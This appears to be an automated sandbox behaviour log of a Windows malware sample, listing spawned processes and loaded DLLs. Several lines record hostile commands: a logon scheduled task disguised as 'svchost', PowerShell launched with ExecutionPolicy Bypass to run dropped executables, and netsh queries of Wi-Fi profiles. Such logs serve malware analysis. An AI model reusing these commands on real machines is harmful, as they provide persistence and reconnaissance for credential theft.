Source: C:\Users\user\Desktop\zrrHgsDzgS.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit
Source: C:\Users\user\AppData\Roaming\svchost.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\udwnme.exe "C:\Users\user\AppData\Local\Temp\udwnme.exe"
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\luglzv.exe "C:\Users\user\AppData\Local\Temp\luglzv.exe"
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr All
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: napinsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: pnrpnsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: wshbth.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: nlaapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: winrnr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                    Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
                    Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
